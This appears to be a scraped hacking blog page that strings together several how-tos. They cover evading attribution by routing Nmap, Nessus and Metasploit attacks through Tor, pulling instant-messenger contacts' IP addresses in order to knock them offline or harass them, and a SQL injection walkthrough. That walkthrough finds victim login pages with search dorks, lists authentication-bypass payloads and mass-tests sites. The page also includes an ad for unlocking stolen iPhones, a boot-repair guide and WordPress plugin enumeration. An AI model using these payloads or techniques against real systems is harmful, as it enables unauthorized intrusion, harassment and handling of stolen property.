How To perform Anonymous Port scanning using Nmap and Tor

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Web. It also permits developers / researchers to generate new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that permit organizations and individuals to share information over public networks without compromising their privacy

The Onion Router [TOR] is an excellent work towards defending online privacy. As of with every debate about exploitation frameworks, security tools, vulnerability disclosures such projects have also been victim of criticism, and debates of potential abuse that they may cause and the dangers of teaching individuals a dangerous and potentially illegal craft and a ‘secure’ channel to hide their online presence. But lets face it, the bad guys already know about it (that is the reason they’re bad ‘eh). However although these channels of misuse and abuse do exist and they cannot be ignored, still the merits of it will always outweigh the harm black community may cause.

Regrettably in the country I live in even most of the senior know-how people I meet / see / have a chance to work with, don’t even have a clue of online privacy or security of their information.

Privacy is every individuals right, and is as important as any other basic human need. You will seldom require somebody tracking your IP, spywares tracing your network activity, and the next time you try to experiment with something, you receive a disagreeable small e mail from an ISP admin that you were doing so-and-so. I am by no way TEMPTING you to do something wrong. Its all about your morale and motivation : ) , the small how-to below is a kick starter for getting started with TOR and experimenting with some stuff securely. Interested ? move on, but don’t go about emailing me that this stuff like this is illegal to be posted and ought to be removed.

The problem

A basic issue for the privacy minded is that the recipient of your communication / conversation or even otherwise can see that you sent it by taking a look at the IP headers, or worse trace the whole path. And so can authorized intermediaries like ISPs, govt. organizations etc, and sometimes unauthorized intermediaries as well. A very simple type of network traffic analysis might involve sitting somewhere between sender and recipient on the network (man-in-the-middle), taking a look at headers.

But there's also more powerful kinds of packet analysis. Some attackers spy on multiple parts of the Web and use sophisticated statistical techniques to track the communications patterns of plenty of different organizations and individuals. Encryption does not help against these attackers, since it only hides the content of Web traffic, not the headers (VPN ? duh!!) .

The solution:
A distributed, anonymous, secure network

To reduce the risks of both simple and sophisticated traffic analysis by distributing your web traffic over several places / servers, so no single point can link you to your location helps defending your privacy. Its like taking a zig-zag random, hard to follow path to deceive somebody who is tracing you (what the heroes usually do against the villain in action films : ) ) , then periodically erasing your footprints. In lieu of taking a direct route from source to location, information packets on TOR take a random pathway through several servers that cover your tracks so no observer at any single point can tell where the information came from or where it is going.

TOR incrementally builds a circuit of encrypted connections through servers on the network which is extended one hop at a time, and each server along the way knows only which server gave it information and which server it is giving information to. No individual server ever knows the whole path that a knowledge packet has taken. The client negotiates a separate set of encryption keys for each hop along the circuit to make positive that each hop cannot trace these connections as they pass through.

Two times a circuit has been established any information can be exchanged and because each server sees no over one hop in the circuit, neither an eavesdropper nor a compromised server can use traffic analysis to link the connection's source and location.

Tor only works for TCP streams and can be used by any application with SOCKS support.

to experiment and write this small how-to, I setup a server on the Web that I desired to scan from my home network using Nmap, Nessus, and metasploit from my bacttrack suite installed in a VM. Here are the steps I followed to launch the scan / exploitation method by Tor:

A. Installing TOR: Detailed instructions can be viewed on the net site.

B) Download socat .This gizmo is an excellent multipurpose relay and will permit to setup a local TCP listener that will tunnel my connections by the Tor SOCKS server (listening on 9050).

Unfortunately socat comes only on bsd and *nix systems. To make use of TOR on windows I would recommend using Privoxy, or better installing the whole TorCP bundle.

Let us assume that the IP address of the host I desired to scan was 202.163.97.20

I invoked socat:

[talha@localhost#] ./socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1: 202.163.97.20:80, socksport=9050

The above command causes socat to listen on port 8080, and tunnel all incoming connections to 202.163.97.20 (port 80) by the Tor SOCKS server.

For using on windows you will need to:

1. Install privoxy
2. permit HTTP CONNECT requests by 80 through your firewall
3. Browse to http://config.privoxy.org/show-status

C. I assume Nmap, Nessus and metasploit are already installed and running. If not you can find the detailed instrucations on respective website.

D. Launch an nmap connect or nessus scan against 127.0.0.1 port 8080. Configure Nessus to limit the scan to port 8080 in the “Scan Options” tab.

Here are a quantity of the entries in my Apache log that were a result of the scan:
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /Album/ HTTP/1.1" 404 204 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 209 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /cgi-bin/wiki.pl? HTTP/1.1" 404 213 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
The 212.9.32.5 IP address represents the host that is the last onion router in the random circuit that was setup by the Tor program

Simlarly two times you discover a vuln in a remote technique, setup another instance of socat: Say for simplicity you are exploiting a webserver (port 80).

[talha@localhost#] ./socat TCP4-LISTEN:1234,fork SOCKS4:127.0.0.1: 202.163.97.20:80,

In metasploit when launching the exploit, set the target IP to 127.0.0.1 and remote port to 1234. Its that simple eh.

The above instructions may even be used to exploit program flaws in order to anonymously execute arbitrary commands on vulnerable hosts.

Some pieces of advice:

1. Nmap makes use of something that generates packets by the raw packet interface so the packets connect directly to the target, not by Tor. For example:
Doing a connect() scan (TCP) will work with Tor but using something like -sS connects directly to the target, revealing your true address.

2. Nmap & Nessus will often ping a target so see if it is up before doing a port scan. This is usually completed by raw ICMP packet's, ICMP won't traverse the Tor network (since its not TCP) and will reveal your true address.

In the usage of socat, socks4 does client side DNS. So you resolve a target host name by DNS from your machine not by the Tor network proxies.

Hence it is impossible to leak your source IP because you tell your scanner to make use of 127.0.0.1 as the target IP . Therefore, nmap / nessus has no host name to resolve, and in case you do forget to tell your scanner not to bother with ICMP pings, you will finish up pinging yourself – not the target directly.

Staying anonymous

Tor cannot solve all anonymity issues. It focuses only on defending the transport of information. You will need to make use of protocol-specific support program in case you don't require the sites you visit to see your identifying information. For example, you can use web proxies such as Privoxy and open relays while web browsing to block cookies and withhold information about your browser type ident.

Be clever. Don't provide your name or other revealing information in web forms. Be aware that, like all anonymizing networks that are fast for web browsing, Tor does not provide protection against end-to-end timing assaults: If your attacker can watch the traffic coming out of your computer, and also the traffic arriving at your selected location, they can use statistical analysis to discover that they are part of the same circuit.

The Electronic Privacy Information Centre (EPIC) lists down a comprehensive list which servers as a sampling of best available privacy enhancing tools.

Read More

How To install Tor in backtrack4

So you’ve been checking out BackTrack 4, and you want to get your anonymity on? This is assuming you have either installed BT4 to your hard drive or you’re using the VMWare version. You can do this on a LiveCD too of course, but your changes won’t stay unless you do some fancy lzm voodoo and burn a new copy of your CD.

First, you need to add noreply.org repositories to your sources.list. These are the official tor repositories for debian-based Linux distrobutions. Open up a terminal and type:

Code:

nano /etc/apt/sources.list

At the bottom of this file, add these two lines:

Code:

deb http://mirror.noreply.org/pub/tor intrepid main
deb-src http://mirror.noreply.org/pub/tor intrepid main

Save the file. Now download the gpg key, and check the fingerprint:

Code:

gpg --keyserver subkeys.pgp.net --recv 94C09C7F
gpg --fingerprint 94C09C7F

The fingerprint should look like this:

Code:

pub 1024D/94C09C7F 1999-11-10
Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid [jpeg image of size 7974]
sub 1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
sub 2048g/E8F4A328 2003-07-09 [expires: 2010-07-18]

Then add it to your apt-key ring by doing this:

Code:

gpg --export 94C09C7F | sudo apt-key add -

Now update your sources, and install tor and privoxy.

Code:

apt-get update
apt-get install tor privoxy

When this is done you’ll need to change a couple of privoxy settings. In a terminal, edit the privoxy config file:

Code:

nano /etc/privoxy/config

Add this line to the top (including the period at the end):

Code:

forward-socks4a / 127.0.0.1:9050 .

Now we need to disable logs. Find the line “logfile logfile” and add a # at the beginning to comment it out (tou can search a file in nano with ctrl-W). You may want to search file the line “jarfile jarfile” and make sure that’s commented out too, but it already is for me. Now exit nano and restart the privoxy service:

Code:

/etc/init.d/privoxy restart

Now head on over to the Torbutton Firefox addon page , install Torbutton, and restart Firefox.

Now head over to the tor detection page . It should tell you that you’re not using tor. Click the tor button in the bottom right corner of Firefox, accept the sad fact that you might leak time zone data, and then press enter in the address bar to reload the page. Note that you can’t just hit refresh, because you need to make sure firefox is opening a new socket it check.torproject.org. If all is well, you see the bright green notice “Congratulations. You are using Tor.”

Read More

How to find the ip Addresses from skype yahoo and msn Updated

The Program we will be using today is called smart sniff the download links are at the bottom. Smartsniff is a network packet analyze it monitors all the incoming and out going data thats going through your PCI Card or WiFi Card. In most cases if its not P2P Such as a IM there will be 2 IPs the one For The server of the Instant Message Provider and The Other IP will be theirs. Now in cases that you want to pull someones IP Straight from Teamviewer that would be very easy.

 Open Up all the programs you need so i have Xfire Open Putty And Smart Sniff Open and Ready to go

After that log in or if your all ready logged in select your VIC that you want to pull the IP From open up a chat and ill give an example of what you do

Example:
You:Hello
Them:Hey
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
All you do is Spam but remember you must click the Green Play button on smart sniff before you do that way it grabs the data/packets the picture below will help you under stand more

Once you have there IP Feel free to Hit them offline or pull there Location and fuck with them all you want

I suggest if your using Skype or AIM To go into a call with them because the packets will Increase Rapidly and you will be able to pull there IP Really quick :)

Downloads: Smartsniff Here

Read More

how to fix Partision not found / Grub Error or remove ubuntu

Okay, I know some people are going to have a cow because I'm posting this. But the truth is, there are a lot of people trying Ubuntu along with windows 7. people who have attempted to remove Ubuntu with out deleting all partitions of ubuntu are left with this grub error .my friend recently faced with this and asked my help to fix this this is a common problem faced by many so i am posting a solution on how fix this

So......for all of you who have a dual-boot system and are looking to remove Ubuntu for now, here are some tips. NEVER NEVER NEVER just remove the Ubuntu partitions - you won't be able to boot Windows because the information pointed to by your master boot record will be gone. Instead, follow these easy steps:

(1) Boot you Windows installation
(2) Click on this link Get Mbrfix
(3) Download the program, unzip it and copy it to your root folder (I'll assume c:\)
(4) Open up the command prompt in Windows by going to start/accessories/command prompt
(5) Type:
cd \ and press "Enter"
mbrfix /drive 0 fixmbr /yes and press "Enter"

*PLEASE NOTE* The above assumes your boot device is device 0 - if you are not sure on this please post for help.

(6) Close the command prompt window


*PLEASE NOTE* The following assumes you want to get rid of your Ubuntu partitions and resize you Windows partition(s) to take up that space. If you do not wish to do so, you can stop now.

(7) Put your Ubuntu LiveCD back in the CD drive and reboot your PC so the the Ubuntu desktop comes up
(8) On the Ubuntu desktop, look at the top menu bar and go to applications/accessories/terminal
(9) When the terminal Window comes up type:
sudo gparted and press "Enter"

This brings up the disk manager. You want to:

(a) delete all non-Windows partitions
(b) resize your Windows partition to be larger (optional - you may want to leave this alone so you can
come back and try Ubuntu again! )

(10) When you have finished deleting the Ubuntu partitions, just restart your PC, removing the CD from the
drive before it boots again.

If everything went correctly, your PC should just automatically boot Windows. Note that on the first boot of Windows after you have changed the disk (especially if you resized the Windows partition), Windows may run a chkdsk - this is normal and should be ok.

If you have already deleted you Linux partitions and are getting grub errors, please try this as suggested by this user (thanks for the neat addition!!)

Bothered
A Carafe of Ubuntu
Join Date: Jun 2007
Location: United Kingdom
Beans: 136
Ubuntu 7.04 Feisty Fawn User
Windows User


Re: HowTo: Remove Ubuntu (& Restore Windows)

--------------------------------------------------------------------------------

If you delete the ubuntu partitions without running mbrfix then you can use the ubuntu LiveCD to restore the master boot record by:

1. Booting from the ubuntu LiveCD
2. Enabling universe repositories - launch System->Administation->Software Sources and check the "Community maintained Open Source software (universe)"
3. Installing the "ms-sys" package - click Applications->Accessories->Terminal and type "sudo apt-get update" and then "sudo apt-get install ms-sys".
4. Finally restore the Windows master boot record by entering the command "ms-sys -w /dev/[drive]", where [drive] is the hard disk whose Windows master boot record you want to restore. You can find out which this is by launching gparted (System->Administration->GNOME Partition Editor) and cycling through the available drives until you find your Windows partition

- - - - -

Hope this helps, and please let me know if anyone finds any errors. Also, for anyone using this post, "we" really hope you will come back to Ubuntu someday! Linux, and Ubuntu, will be waiting!

============================

Trouble shooting:

If, after following this guide, you can not boot to Windows you may need to boot a live CD and manually delete the Ubuntu partition (making it unpartitioned space, adding it to the Windows partition, or formatting it to FAT/NTFS). Additionally you need to be sure the MBR is set for Windows. You will need to search the forums for more help on that. In addition, the following Microsoft articles may be of help:

Read More

How To Factory Unlock Your IPhone Rite from your Home

Recently i came across a website where you can Factory unlock any iPhone permanently rite from you home .I Factory unlocked my iphone 5 locked To AT&T in just 6 hours .


Why to unlock your iPhone what difference will it make ?

• After unlocking you can use your iphone with any Gsm carrier in the world . Means you can shift  to any carrier that best suits  your needs .
• Unlike soft ware or hardware unlocks this wont void your warranty .
• Its safe and fast you just need to order the unlock , and restore your iphone from itunes  to get it unlocked as simple as that .
• You can increase the resale value of your iphone .
• you can even unlock black listed , stolen or insurance claimed phones . they will work normally like a factory unlocked phone after unlocking 

 What models are supported ?

 The big thing is you unlock almost all iPhone models from 40 countries and 500 different carriers around the world . Breakthelock.com supports all base bands and firmware versions .

unlike software unlocks or jailbreaks , This is a permanent solution you just need to unlock it once and you iphone will stay unlocked forever .You can update IOS, sync with iTunes ,change Sim cards when ever you like with of the fear of ever re locking again .Unlock IPhone now..

Read More

What is SQL Injection and How to do It

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org"thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hacking

Read More

Wordpress Hack : Find all the plugins being used on a WP blog

Plugins enhance the functionality of Wordpress. Plugins are very important for any blogger who wishes to make his/her blog a success. Its the same reason why no blogger would like to reveal what all plugins he/she uses.

Here’s a simple wordpress hack through which you can find ALL the plugins being used on a wordpress blog. It wont work on all but will work for most.

1. 
   
   Identify your victim. Let’s say http://www.example.com
   
   
2. 
   
   In the address bar type the following : http://www.example.com/wp-content/plugins
   
   

You should get the list of plugins being used as a directory structure!

The workaround this is to disable directory viewing in their hosting control panels or by adding the following line to the .htaccess file :

Options –Indexes

This returns a 403 error to the user.

Read More